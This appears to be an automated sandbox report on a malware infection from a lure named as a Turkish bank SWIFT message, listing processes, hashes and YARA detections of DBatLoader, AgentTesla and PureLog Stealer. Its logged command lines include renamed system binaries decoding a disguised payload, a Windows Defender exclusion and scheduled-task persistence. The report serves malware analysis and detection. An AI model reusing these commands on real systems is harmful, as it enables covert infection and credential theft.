                                                                                                                                                                                                                                                                                                                                                                                                                                        Path:C:\Users\Public\alpha.exe
                                                                                                                                                                                                                                                                                                                                                                                                                                        Wow64 process (32bit):false
                                                                                                                                                                                                                                                                                                                                                                                                                                        Commandline:C:\\Users\\Public\\alpha /c extrac32 /C /Y C:\\Windows\\System32\\certutil.exe C:\\Users\\Public\\kn.exe
                                                                                                                                                                                                                                                                                                                                                                                                                                        Imagebase:0x7ff706eb0000
                                                                                                                                                                                                                                                                                                                                                                                                                                        File size:289'792 bytes
                                                                                                                                                                                                                                                                                                                                                                                                                                        MD5 hash:8A2122E8162DBEF04694B9C3E0B6CDEE
                                                                                                                                                                                                                                                                                                                                                                                                                                        Has elevated privileges:true
                                                                                                                                                                                                                                                                                                                                                                                                                                        Has administrator privileges:true
                                                                                                                                                                                                                                                                                                                                                                                                                                        Programmed in:C, C++ or other language
                                                                                                                                                                                                                                                                                                                                                                                                                                        Reputation:high
                                                                                                                                                                                                                                                                                                                                                                                                                                        Has exited:true

                                                                                                                                                                                                                                                                                                                                                                                                                                        Target ID:10
                                                                                                                                                                                                                                                                                                                                                                                                                                        Start time:03:57:09
                                                                                                                                                                                                                                                                                                                                                                                                                                        Start date:18/11/2024
                                                                                                                                                                                                                                                                                                                                                                                                                                        Path:C:\Windows\System32\extrac32.exe
                                                                                                                                                                                                                                                                                                                                                                                                                                        Wow64 process (32bit):false
                                                                                                                                                                                                                                                                                                                                                                                                                                        Commandline:extrac32 /C /Y C:\\Windows\\System32\\certutil.exe C:\\Users\\Public\\kn.exe
                                                                                                                                                                                                                                                                                                                                                                                                                                        Imagebase:0x7ff7ada70000
                                                                                                                                                                                                                                                                                                                                                                                                                                        File size:35'328 bytes
                                                                                                                                                                                                                                                                                                                                                                                                                                        MD5 hash:41330D97BF17D07CD4308264F3032547
                                                                                                                                                                                                                                                                                                                                                                                                                                        Has elevated privileges:true
                                                                                                                                                                                                                                                                                                                                                                                                                                        Has administrator privileges:true
                                                                                                                                                                                                                                                                                                                                                                                                                                        Programmed in:C, C++ or other language
                                                                                                                                                                                                                                                                                                                                                                                                                                        Reputation:moderate
                                                                                                                                                                                                                                                                                                                                                                                                                                        Has exited:true

                                                                                                                                                                                                                                                                                                                                                                                                                                        Target ID:11
                                                                                                                                                                                                                                                                                                                                                                                                                                        Start time:03:57:10
                                                                                                                                                                                                                                                                                                                                                                                                                                        Start date:18/11/2024
                                                                                                                                                                                                                                                                                                                                                                                                                                        Path:C:\Users\Public\alpha.exe
                                                                                                                                                                                                                                                                                                                                                                                                                                        Wow64 process (32bit):false
                                                                                                                                                                                                                                                                                                                                                                                                                                        Commandline:C:\\Users\\Public\\alpha /c C:\\Users\\Public\\kn -decodehex -F "C:\Users\user\Desktop\Ziraat_Bankasi_Swift_Mesaji_BXB04958T.cmd" "C:\\Users\\Public\\AnyDesk.jpeg" 9
                                                                                                                                                                                                                                                                                                                                                                                                                                        Imagebase:0x7ff706eb0000
                                                                                                                                                                                                                                                                                                                                                                                                                                        File size:289'792 bytes
                                                                                                                                                                                                                                                                                                                                                                                                                                        MD5 hash:8A2122E8162DBEF04694B9C3E0B6CDEE
                                                                                                                                                                                                                                                                                                                                                                                                                                        Has elevated privileges:true
                                                                                                                                                                                                                                                                                                                                                                                                                                        Has administrator privileges:true
                                                                                                                                                                                                                                                                                                                                                                                                                                        Programmed in:C, C++ or other language
                                                                                                                                                                                                                                                                                                                                                                                                                                        Reputation:high
                                                                                                                                                                                                                                                                                                                                                                                                                                        Has exited:true

                                                                                                                                                                                                                                                                                                                                                                                                                                        Target ID:12
                                                                                                                                                                                                                                                                                                                                                                                                                                        Start time:03:57:10
                                                                                                                                                                                                                                                                                                                                                                                                                                        Start date:18/11/2024
                                                                                                                                                                                                                                                                                                                                                                                                                                        Path:C:\Users\Public\kn.exe
                                                                                                                                                                                                                                                                                                                                                                                                                                        Wow64 process (32bit):false
                                                                                                                                                                                                                                                                                                                                                                                                                                        Commandline:C:\\Users\\Public\\kn -decodehex -F "C:\Users\user\Desktop\Ziraat_Bankasi_Swift_Mesaji_BXB04958T.cmd" "C:\\Users\\Public\\AnyDesk.jpeg" 9
                                                                                                                                                                                                                                                                                                                                                                                                                                        Imagebase:0x7ff627a40000
                                                                                                                                                                                                                                                                                                                                                                                                                                        File size:1'651'712 bytes
                                                                                                                                                                                                                                                                                                                                                                                                                                        MD5 hash:F17616EC0522FC5633151F7CAA278CAA
                                                                                                                                                                                                                                                                                                                                                                                                                                        Has elevated privileges:true
                                                                                                                                                                                                                                                                                                                                                                                                                                        Has administrator privileges:true
                                                                                                                                                                                                                                                                                                                                                                                                                                        Programmed in:C, C++ or other language
                                                                                                                                                                                                                                                                                                                                                                                                                                        Reputation:moderate
                                                                                                                                                                                                                                                                                                                                                                                                                                        Has exited:true

                                                                                                                                                                                                                                                                                                                                                                                                                                        Target ID:13
                                                                                                                                                                                                                                                                                                                                                                                                                                        Start time:03:57:11
                                                                                                                                                                                                                                                                                                                                                                                                                                        Start date:18/11/2024
                                                                                                                                                                                                                                                                                                                                                                                                                                        Path:C:\Users\Public\alpha.exe
                                                                                                                                                                                                                                                                                                                                                                                                                                        Wow64 process (32bit):false
                                                                                                                                                                                                                                                                                                                                                                                                                                        Commandline:C:\\Users\\Public\\alpha /c C:\\Users\\Public\\kn -decodehex -F "C:\\Users\\Public\\AnyDesk.jpeg" "C:\\Users\\Public\\Libraries\\AnyDesk.PIF" 12
                                                                                                                                                                                                                                                                                                                                                                                                                                        Imagebase:0x7ff706eb0000
                                                                                                                                                                                                                                                                                                                                                                                                                                        File size:289'792 bytes
                                                                                                                                                                                                                                                                                                                                                                                                                                        MD5 hash:8A2122E8162DBEF04694B9C3E0B6CDEE
                                                                                                                                                                                                                                                                                                                                                                                                                                        Has elevated privileges:true
                                                                                                                                                                                                                                                                                                                                                                                                                                        Has administrator privileges:true
                                                                                                                                                                                                                                                                                                                                                                                                                                        Programmed in:C, C++ or other language
                                                                                                                                                                                                                                                                                                                                                                                                                                        Reputation:high
                                                                                                                                                                                                                                                                                                                                                                                                                                        Has exited:true

                                                                                                                                                                                                                                                                                                                                                                                                                                        Target ID:14
                                                                                                                                                                                                                                                                                                                                                                                                                                        Start time:03:57:11
                                                                                                                                                                                                                                                                                                                                                                                                                                        Start date:18/11/2024
                                                                                                                                                                                                                                                                                                                                                                                                                                        Path:C:\Users\Public\kn.exe
                                                                                                                                                                                                                                                                                                                                                                                                                                        Wow64 process (32bit):false
                                                                                                                                                                                                                                                                                                                                                                                                                                        Commandline:C:\\Users\\Public\\kn -decodehex -F "C:\\Users\\Public\\AnyDesk.jpeg" "C:\\Users\\Public\\Libraries\\AnyDesk.PIF" 12
                                                                                                                                                                                                                                                                                                                                                                                                                                        Imagebase:0x7ff627a40000
                                                                                                                                                                                                                                                                                                                                                                                                                                        File size:1'651'712 bytes
                                                                                                                                                                                                                                                                                                                                                                                                                                        MD5 hash:F17616EC0522FC5633151F7CAA278CAA
                                                                                                                                                                                                                                                                                                                                                                                                                                        Has elevated privileges:true
                                                                                                                                                                                                                                                                                                                                                                                                                                        Has administrator privileges:true
                                                                                                                                                                                                                                                                                                                                                                                                                                        Programmed in:C, C++ or other language
                                                                                                                                                                                                                                                                                                                                                                                                                                        Reputation:moderate
                                                                                                                                                                                                                                                                                                                                                                                                                                        Has exited:true

Target ID:15
Start time:03:57:12
Start date:18/11/2024
Path:C:\Users\Public\Libraries\AnyDesk.PIF
Wow64 process (32bit):true
Commandline:C:\Users\Public\Libraries\AnyDesk.PIF
Imagebase:0x400000
File size:1'239'552 bytes
MD5 hash:E02910D2D83F40FAEF8719A99EE0EF5B
Has elevated privileges:true
Has administrator privileges:true
Programmed in:Borland Delphi
Yara matches:
• Rule: JoeSecurity_DBatLoader, Description: Yara detected DBatLoader, Source: 0000000F.00000003.1311463700.000000007FC50000.00000004.00001000.00020000.00000000.sdmp, Author: Joe Security
• Rule: JoeSecurity_DBatLoader, Description: Yara detected DBatLoader, Source: 0000000F.00000003.1311999021.000000007F920000.00000004.00001000.00020000.00000000.sdmp, Author: Joe Security
Has exited:true

Target ID:16
Start time:03:57:12
Start date:18/11/2024
Path:C:\Users\Public\alpha.exe
Wow64 process (32bit):false
Commandline:C:\\Users\\Public\\alpha /c del /q "C:\Users\Public\kn.exe" / A / F / Q / S
Imagebase:0x7ff706eb0000
File size:289'792 bytes
MD5 hash:8A2122E8162DBEF04694B9C3E0B6CDEE
Has elevated privileges:true
Has administrator privileges:true
Programmed in:C, C++ or other language
Has exited:true

Target ID:17
Start time:03:57:12
Start date:18/11/2024
Path:C:\Users\Public\alpha.exe
Wow64 process (32bit):false
Commandline:C:\\Users\\Public\\alpha /c del /q "C:\Users\Public\AnyDesk.jpeg" / A / F / Q / S
Imagebase:0x7ff706eb0000
File size:289'792 bytes
MD5 hash:8A2122E8162DBEF04694B9C3E0B6CDEE
Has elevated privileges:true
Has administrator privileges:true
Programmed in:C, C++ or other language
Has exited:true

Target ID:19
Start time:03:57:22
Start date:18/11/2024
Path:C:\Windows\SysWOW64\cmd.exe
Wow64 process (32bit):true
Commandline:C:\Windows\system32\cmd.exe /c ""C:\Users\Public\Libraries\aymtmquJ.cmd" "
Imagebase:0xd70000
File size:236'544 bytes
MD5 hash:D0FCE3AFA6AA1D58CE9FA336CC2B675B
Has elevated privileges:true
Has administrator privileges:true
Programmed in:C, C++ or other language
Has exited:true

Target ID:20
Start time:03:57:22
Start date:18/11/2024
Path:C:\Windows\System32\conhost.exe
Wow64 process (32bit):false
Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Imagebase:0x7ff620390000
File size:862'208 bytes
MD5 hash:0D698AF330FD17BEE3BF90011D49251D
Has elevated privileges:true
Has administrator privileges:true
Programmed in:C, C++ or other language
Has exited:true

Target ID:21
Start time:03:57:23
Start date:18/11/2024
Path:C:\Windows\SysWOW64\esentutl.exe
Wow64 process (32bit):true
Commandline:C:\\Windows\\System32\\esentutl /y C:\\Windows\\System32\\cmd.exe /d C:\\Users\\Public\\alpha.pif /o
Imagebase:0x3b0000
File size:352'768 bytes
MD5 hash:5F5105050FBE68E930486635C5557F84
Has elevated privileges:true
Has administrator privileges:true
Programmed in:C, C++ or other language
Has exited:true

Target ID:22
Start time:03:57:23
Start date:18/11/2024
Path:C:\Windows\SysWOW64\esentutl.exe
Wow64 process (32bit):true
Commandline:C:\\Windows\\System32\\esentutl /y C:\\Windows\\System32\\ping.exe /d C:\\Users\\Public\\xpha.pif /o
Imagebase:0x3b0000
File size:352'768 bytes
MD5 hash:5F5105050FBE68E930486635C5557F84
Has elevated privileges:true
Has administrator privileges:true
Programmed in:C, C++ or other language
Has exited:true

Target ID:23
Start time:03:57:24
Start date:18/11/2024
Path:C:\Windows\SysWOW64\esentutl.exe
Wow64 process (32bit):true
Commandline:C:\\Windows\\System32\\esentutl.exe /y C:\Users\Public\Libraries\AnyDesk.PIF /d C:\\Users\\Public\\Libraries\\Juqmtmya.PIF /o
Imagebase:0x3b0000
File size:352'768 bytes
MD5 hash:5F5105050FBE68E930486635C5557F84
Has elevated privileges:true
Has administrator privileges:true
Programmed in:C, C++ or other language
Has exited:true

Target ID:24
Start time:03:57:24
Start date:18/11/2024
Path:C:\Windows\System32\conhost.exe
Wow64 process (32bit):false
Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Imagebase:0x7ff620390000
File size:862'208 bytes
MD5 hash:0D698AF330FD17BEE3BF90011D49251D
Has elevated privileges:true
Has administrator privileges:true
Programmed in:C, C++ or other language
Has exited:true

Target ID:25
Start time:03:57:24
Start date:18/11/2024
Path:C:\Users\Public\Libraries\aymtmquJ.pif
Wow64 process (32bit):true
Commandline:C:\Users\Public\Libraries\aymtmquJ.pif
Imagebase:0x400000
File size:68'096 bytes
MD5 hash:C116D3604CEAFE7057D77FF27552C215
Has elevated privileges:true
Has administrator privileges:true
Programmed in:C, C++ or other language
Has exited:true

Target ID:27
Start time:03:57:25
Start date:18/11/2024
Path:C:\Users\user\AppData\Local\Temp\Native_neworigin.exe
Wow64 process (32bit):true
Commandline:"C:\Users\user\AppData\Local\Temp\Native_neworigin.exe"
Imagebase:0x400000
File size:1'425'408 bytes
MD5 hash:9ECE2AAE8E8FA77849268DDA20CAEC7B
Has elevated privileges:true
Has administrator privileges:true
Programmed in:C, C++ or other language
Yara matches:
                                                                                                                                                                                                                                                                                                                                                                                                                                        • Rule: JoeSecurity_AgentTesla_1, Description: Yara detected AgentTesla, Source: 0000001B.00000002.1722177417.000000000305A000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                                                                                                                                                                                                                                                                                                                                                                                                                        • Rule: JoeSecurity_PureLogStealer, Description: Yara detected PureLog Stealer, Source: 0000001B.00000002.1782700008.0000000005360000.00000004.08000000.00040000.00000000.sdmp, Author: Joe Security
                                                                                                                                                                                                                                                                                                                                                                                                                                        • Rule: JoeSecurity_PureLogStealer, Description: Yara detected PureLog Stealer, Source: 0000001B.00000002.1714513945.0000000002B26000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security
                                                                                                                                                                                                                                                                                                                                                                                                                                        • Rule: JoeSecurity_PureLogStealer, Description: Yara detected PureLog Stealer, Source: 0000001B.00000003.1443226587.000000000065A000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security
                                                                                                                                                                                                                                                                                                                                                                                                                                        • Rule: JoeSecurity_PureLogStealer, Description: Yara detected PureLog Stealer, Source: 0000001B.00000002.1781352411.00000000052D0000.00000004.08000000.00040000.00000000.sdmp, Author: Joe Security
                                                                                                                                                                                                                                                                                                                                                                                                                                        • Rule: JoeSecurity_PureLogStealer, Description: Yara detected PureLog Stealer, Source: 0000001B.00000002.1767484584.000000000401D000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                                                                                                                                                                                                                                                                                                                                                                                                                        • Rule: JoeSecurity_CredentialStealer, Description: Yara detected Credential Stealer, Source: 0000001B.00000002.1722177417.0000000003001000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                                                                                                                                                                                                                                                                                                                                                                                                                        • Rule: JoeSecurity_AgentTesla_1, Description: Yara detected AgentTesla, Source: 0000001B.00000002.1722177417.0000000003001000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                                                                                                                                                                                                                                                                                                                                                                                                                        Has exited:true

Target ID:28
Start time:03:57:25
Start date:18/11/2024
Path:C:\Users\user\AppData\Local\Temp\Trading_AIBot.exe
Wow64 process (32bit):true
Commandline:"C:\Users\user\AppData\Local\Temp\Trading_AIBot.exe"
Imagebase:0x7ff7df220000
File size:70'656 bytes
MD5 hash:E91A1DB64F5262A633465A0AAFF7A0B0
Has elevated privileges:true
Has administrator privileges:true
Programmed in:C, C++ or other language
Has exited:true

Target ID:29
Start time:03:57:27
Start date:18/11/2024
Path:C:\Windows\System32\alg.exe
Wow64 process (32bit):false
Commandline:C:\Windows\System32\alg.exe
Imagebase:0x140000000
File size:1'225'728 bytes
MD5 hash:1E467BDA5911F0899BC6AC04CDE8ACA5
Has elevated privileges:true
Has administrator privileges:true
Programmed in:C, C++ or other language
Has exited:false

Target ID:30
Start time:03:57:28
Start date:18/11/2024
Path:C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
Wow64 process (32bit):true
Commandline:"powershell.exe" Add-MpPreference -ExclusionPath 'C:\Users\user\AppData\Roaming\ACCApi'
Imagebase:0x5a0000
File size:433'152 bytes
MD5 hash:C32CA4ACFCC635EC1EA6ED8A34DF5FAC
Has elevated privileges:true
Has administrator privileges:true
Programmed in:C, C++ or other language
Has exited:true

Target ID:31
Start time:03:57:28
Start date:18/11/2024
Path:C:\Windows\SysWOW64\schtasks.exe
Wow64 process (32bit):true
Commandline:"schtasks.exe" /create /tn AccSys /tr "C:\Users\user\AppData\Roaming\ACCApi\apihost.exe" /st 04:02 /du 23:59 /sc daily /ri 1 /f
Imagebase:0xf90000
File size:187'904 bytes
MD5 hash:48C2FE20575769DE916F48EF0676A965
Has elevated privileges:true
Has administrator privileges:true
Programmed in:C, C++ or other language
Has exited:true

Target ID:32
Start time:03:57:28
Start date:18/11/2024
Path:C:\Windows\System32\conhost.exe
Wow64 process (32bit):false
Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Imagebase:0x7ff620390000
File size:862'208 bytes
MD5 hash:0D698AF330FD17BEE3BF90011D49251D
Has elevated privileges:true
Has administrator privileges:true
Programmed in:C, C++ or other language
Has exited:true

Target ID:33
Start time:03:57:28
Start date:18/11/2024
Path:C:\Windows\System32\conhost.exe
Wow64 process (32bit):false
Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Imagebase:0x7ff620390000
File size:862'208 bytes
MD5 hash:0D698AF330FD17BEE3BF90011D49251D
Has elevated privileges:true
Has administrator privileges:true
Programmed in:C, C++ or other language
Has exited:true

Target ID:34
Start time:03:57:33
Start date:18/11/2024
Path:C:\Windows\System32\drivers\AppVStrm.sys
Wow64 process (32bit):false
Commandline:
Imagebase:0x7ff7df220000
File size:138'056 bytes
MD5 hash:BDA55F89B69757320BC125FF1CB53B26
Has elevated privileges:
Has administrator privileges:
Programmed in:C, C++ or other language
Has exited:false

Target ID:35
Start time:03:57:33
Start date:18/11/2024
Path:C:\Windows\System32\drivers\AppvVemgr.sys
Wow64 process (32bit):
Commandline:
Imagebase:
File size:174'408 bytes
MD5 hash:E70EE9B57F8D771E2F4D6E6B535F6757
Has elevated privileges:
Has administrator privileges:
Programmed in:C, C++ or other language
Has exited:false

Target ID:36
Start time:03:57:33
Start date:18/11/2024
Path:C:\Windows\System32\drivers\AppvVfs.sys
Wow64 process (32bit):
Commandline:
Imagebase:
File size:154'952 bytes
MD5 hash:2CBABD729D5E746B6BD8DC1B4B4DB1E1
Has elevated privileges:
Has administrator privileges:
Programmed in:C, C++ or other language
Has exited:false

Target ID:37
Start time:03:57:33
Start date:18/11/2024
Path:C:\Windows\System32\AppVClient.exe
Wow64 process (32bit):false
Commandline:C:\Windows\system32\AppVClient.exe
Imagebase:0x140000000
File size:1'348'608 bytes
MD5 hash:6341995A4613FCE6AD6219013E4B7646
Has elevated privileges:true
Has administrator privileges:true
Programmed in:C, C++ or other language
Has exited:true

Target ID:38
Start time:03:57:37
Start date:18/11/2024
Path:C:\Windows\System32\wbem\WmiPrvSE.exe
Wow64 process (32bit):false
Commandline:C:\Windows\system32\wbem\wmiprvse.exe -secured -Embedding
Imagebase:0x7ff6616b0000
File size:496'640 bytes
MD5 hash:60FF40CFD7FB8FE41EE4FE9AE5FE1C51
Has elevated privileges:true
Has administrator privileges:false
Programmed in:C, C++ or other language
Has exited:true

Target ID:40
Start time:03:57:39
Start date:18/11/2024
Path:C:\Users\Public\Libraries\Juqmtmya.PIF
Wow64 process (32bit):true
Commandline:"C:\Users\Public\Libraries\Juqmtmya.PIF"
Imagebase:0x400000
File size:1'239'552 bytes
MD5 hash:E02910D2D83F40FAEF8719A99EE0EF5B
Has elevated privileges:false
Has administrator privileges:false
Programmed in:Borland Delphi
Has exited:true

Target ID:42
Start time:03:57:42
Start date:18/11/2024
Path:C:\Users\Public\Libraries\aymtmquJ.pif
Wow64 process (32bit):true
Commandline:C:\Users\Public\Libraries\aymtmquJ.pif
Imagebase:0x400000
File size:68'096 bytes
MD5 hash:C116D3604CEAFE7057D77FF27552C215
Has elevated privileges:false
Has administrator privileges:false
Programmed in:C, C++ or other language
Has exited:true

Target ID:43
Start time:03:57:42
Start date:18/11/2024
Path:C:\Users\user\AppData\Local\Temp\Native_neworigin.exe
Wow64 process (32bit):true
Commandline:"C:\Users\user\AppData\Local\Temp\Native_neworigin.exe"
Imagebase:0x400000
File size:1'425'408 bytes
MD5 hash:9ECE2AAE8E8FA77849268DDA20CAEC7B
Has elevated privileges:false
Has administrator privileges:false
Programmed in:C, C++ or other language
Yara matches:
• Rule: JoeSecurity_PureLogStealer, Description: Yara detected PureLog Stealer, Source: 0000002B.00000003.1635956799.0000000000705000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security
• Rule: JoeSecurity_PureLogStealer, Description: Yara detected PureLog Stealer, Source: 0000002B.00000002.1772725476.0000000002A26000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security
• Rule: JoeSecurity_CredentialStealer, Description: Yara detected Credential Stealer, Source: 0000002B.00000002.1784000004.0000000002E20000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
• Rule: JoeSecurity_AgentTesla_1, Description: Yara detected AgentTesla, Source: 0000002B.00000002.1784000004.0000000002E20000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
• Rule: JoeSecurity_PureLogStealer, Description: Yara detected PureLog Stealer, Source: 0000002B.00000002.1814740153.0000000005700000.00000004.08000000.00040000.00000000.sdmp, Author: Joe Security
• Rule: JoeSecurity_PureLogStealer, Description: Yara detected PureLog Stealer, Source: 0000002B.00000002.1807691329.0000000003D45000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
• Rule: JoeSecurity_PureLogStealer, Description: Yara detected PureLog Stealer, Source: 0000002B.00000002.1810974592.0000000004F70000.00000004.08000000.00040000.00000000.sdmp, Author: Joe Security
Has exited:true

Target ID:44
Start time:03:57:43
Start date:18/11/2024
Path:C:\Users\user\AppData\Local\Temp\Trading_AIBot.exe
Wow64 process (32bit):true
Commandline:"C:\Users\user\AppData\Local\Temp\Trading_AIBot.exe"
Imagebase:0x600000
File size:70'656 bytes
MD5 hash:E91A1DB64F5262A633465A0AAFF7A0B0
Has elevated privileges:false
Has administrator privileges:false
Programmed in:C, C++ or other language
Has exited:true

Target ID:45
Start time:03:57:48
Start date:18/11/2024
Path:C:\Users\Public\Libraries\Juqmtmya.PIF
Wow64 process (32bit):true
Commandline:"C:\Users\Public\Libraries\Juqmtmya.PIF"
Imagebase:0x400000
File size:1'239'552 bytes
MD5 hash:E02910D2D83F40FAEF8719A99EE0EF5B
Has elevated privileges:false
Has administrator privileges:false
Programmed in:Borland Delphi
Has exited:true

Target ID:47
Start time:03:57:51
Start date:18/11/2024
Path:C:\Users\Public\Libraries\aymtmquJ.pif
Wow64 process (32bit):true
Commandline:C:\Users\Public\Libraries\aymtmquJ.pif
Imagebase:0x400000
File size:68'096 bytes
MD5 hash:C116D3604CEAFE7057D77FF27552C215
Has elevated privileges:false
Has administrator privileges:false
Programmed in:C, C++ or other language
Has exited:true


Execution Graph

Execution Coverage:5.5%
Dynamic/Decrypted Code Coverage:0%
Signature Coverage:31.9%
Total number of Nodes:852
Total number of Limit Nodes:21
18734->18825 18737 7ff706ebb900 166 API calls 18739 7ff706ec21d0 18737->18739 18738 7ff706ece04a ??_V@YAXPEAX 18738->18728 18739->18738 18740 7ff706ec221c wcsspn 18739->18740 18748 7ff706ec22a4 ??_V@YAXPEAX 18739->18748 18742 7ff706ebb900 166 API calls 18740->18742 18743 7ff706ec223b 18742->18743 18743->18738 18746 7ff706ec2252 18743->18746 18744 7ff706ebd3f0 223 API calls 18744->18748 18745 7ff706ece06d wcschr 18745->18746 18746->18745 18747 7ff706ece090 towupper 18746->18747 18749 7ff706ec228f 18746->18749 18747->18746 18747->18749 18748->18728 18749->18744 18751 7ff706ebd0f8 18750->18751 18782 7ff706ebce5b 18750->18782 18752 7ff706ec8f80 7 API calls 18751->18752 18754 7ff706ebd10a 18752->18754 18753 7ff706ecc860 18755 7ff706ecc97c 18753->18755 18758 7ff706edee88 390 API calls 18753->18758 18754->18705 18757 7ff706ede9b4 197 API calls 18755->18757 18759 7ff706ecc981 longjmp 18757->18759 18760 7ff706ecc879 18758->18760 18761 7ff706ecc99a 18759->18761 18762 7ff706ecc882 EnterCriticalSection LeaveCriticalSection 18760->18762 18763 7ff706ecc95c 18760->18763 18761->18751 18764 7ff706ecc9b3 ??_V@YAXPEAX 18761->18764 18766 7ff706ebd0e3 18762->18766 18763->18755 18767 7ff706eb96b4 186 API calls 18763->18767 18764->18751 18766->18705 18767->18763 18768 7ff706ebceaa _tell 18770 7ff706ebd208 _close 18768->18770 18769 7ff706ebcd90 166 API calls 18769->18782 18770->18782 18771 7ff706ecc9d5 18909 7ff706edd610 18771->18909 18773 7ff706ebb900 166 API calls 18773->18782 18775 7ff706ecca07 18776 7ff706ede91c 198 API calls 18775->18776 18781 7ff706ecca0c 18776->18781 18777 7ff706edbfec 176 API calls 18778 7ff706ecc9f1 18777->18778 18780 7ff706eb3240 166 API calls 18778->18780 18779 7ff706ebcf33 memset 18779->18782 18780->18775 18781->18705 18782->18751 18782->18753 18782->18761 18782->18766 18782->18769 18782->18771 18782->18773 18782->18779 18783 7ff706ebca40 17 API calls 18782->18783 18784 7ff706ebd184 wcschr 18782->18784 18785 7ff706edbfec 176 API calls 18782->18785 18786 
7ff706ebd1a7 wcschr 18782->18786 18787 7ff706ecc9c9 18782->18787 18790 7ff706ec0a6c 273 API calls 18782->18790 18791 7ff706ebbe00 635 API calls 18782->18791 18792 7ff706ec3448 166 API calls 18782->18792 18793 7ff706ebcfab _wcsicmp 18782->18793 18794 7ff706ec0580 12 API calls 18782->18794 18798 7ff706ec1fac 238 API calls 18782->18798 18799 7ff706ebd044 ??_V@YAXPEAX 18782->18799 18835 7ff706ec0494 18782->18835 18848 7ff706ebdf60 18782->18848 18868 7ff706ed778c 18782->18868 18899 7ff706edc738 18782->18899 18783->18782 18784->18782 18785->18782 18786->18782 18788 7ff706ec855c ??_V@YAXPEAX 18787->18788 18788->18751 18790->18782 18791->18782 18792->18782 18793->18782 18795 7ff706ebd003 GetConsoleOutputCP GetCPInfo 18794->18795 18796 7ff706ec04f4 3 API calls 18795->18796 18796->18782 18798->18782 18799->18782 18801 7ff706ecb6e2 RevertToSelf CloseHandle 18800->18801 18802 7ff706eb96c8 18800->18802 18803 7ff706eb96ce 18802->18803 18804 7ff706eb6a48 184 API calls 18802->18804 18803->18705 18804->18802 18806 7ff706ec5a12 18805->18806 18807 7ff706ec596c 18805->18807 18806->18705 18807->18806 18808 7ff706ec598d VirtualQuery 18807->18808 18808->18806 18810 7ff706ec59ad 18808->18810 18809 7ff706ec59b7 VirtualQuery 18809->18806 18809->18810 18810->18806 18810->18809 18812 7ff706ede954 18811->18812 18813 7ff706ede990 18811->18813 18815 7ff706edee88 390 API calls 18812->18815 18814 7ff706ede9b4 197 API calls 18813->18814 18816 7ff706ede995 longjmp 18814->18816 18817 7ff706ede964 18815->18817 18817->18813 18818 7ff706eb96b4 186 API calls 18817->18818 18818->18817 18823 7ff706ed76a3 18819->18823 18820 7ff706ed76b7 18822 7ff706ede9b4 197 API calls 18820->18822 18821 7ff706eb96b4 186 API calls 18821->18823 18824 7ff706ed76bc longjmp 18822->18824 18823->18820 18823->18821 18826 7ff706ec2da3 18825->18826 18827 7ff706ec2d89 18825->18827 18826->18827 18829 7ff706ec2dbc GetProcessHeap RtlFreeHeap 18826->18829 18830 7ff706ec21af 18827->18830 18831 7ff706ec2e0c 18827->18831 18829->18826 
18829->18827 18830->18737 18832 7ff706ec2e11 18831->18832 18833 7ff706ec2e32 18831->18833 18832->18833 18834 7ff706ece494 VirtualFree 18832->18834 18833->18827 18836 7ff706ec04a4 18835->18836 18837 7ff706ec26e0 19 API calls 18836->18837 18838 7ff706ec04b9 _get_osfhandle SetFilePointer 18836->18838 18839 7ff706ecd845 18836->18839 18840 7ff706ecd839 18836->18840 18842 7ff706eb3278 166 API calls 18836->18842 18837->18836 18838->18782 18841 7ff706edf1d8 166 API calls 18839->18841 18843 7ff706eb3278 166 API calls 18840->18843 18844 7ff706ecd837 18841->18844 18845 7ff706ecd819 _getch 18842->18845 18843->18844 18845->18836 18846 7ff706ecd832 18845->18846 18918 7ff706edbde4 EnterCriticalSection LeaveCriticalSection 18846->18918 18849 7ff706ebdfe2 18848->18849 18850 7ff706ebdf93 18848->18850 18852 7ff706ebe100 VirtualFree 18849->18852 18853 7ff706ebe00b _setjmp 18849->18853 18850->18849 18851 7ff706ebdf9f GetProcessHeap RtlFreeHeap 18850->18851 18851->18849 18851->18850 18852->18849 18854 7ff706ebe04a 18853->18854 18862 7ff706ebe0c3 18853->18862 18919 7ff706ebe600 18854->18919 18856 7ff706ebe073 18857 7ff706ebe081 18856->18857 18858 7ff706ebe0e0 longjmp 18856->18858 18928 7ff706ebd250 18857->18928 18859 7ff706ebe0b0 18858->18859 18859->18862 18959 7ff706edd3fc 18859->18959 18862->18768 18865 7ff706ebe600 473 API calls 18866 7ff706ebe0a7 18865->18866 18866->18859 18867 7ff706edd610 167 API calls 18866->18867 18867->18859 18886 7ff706ed77bc 18868->18886 18869 7ff706ed7aca 18872 7ff706ec34a0 166 API calls 18869->18872 18870 7ff706ed79c0 18876 7ff706ec34a0 166 API calls 18870->18876 18874 7ff706ed7adb 18872->18874 18873 7ff706ed7ab5 18877 7ff706ec3448 166 API calls 18873->18877 18879 7ff706ed7af0 18874->18879 18883 7ff706ec3448 166 API calls 18874->18883 18875 7ff706ed7984 18875->18870 18880 7ff706ed7989 18875->18880 18882 7ff706ed79d6 18876->18882 18892 7ff706ed79ef 18877->18892 18878 7ff706ed7a00 18884 7ff706ed7a0b 18878->18884 18878->18892 18898 7ff706ed7a33 18878->18898 
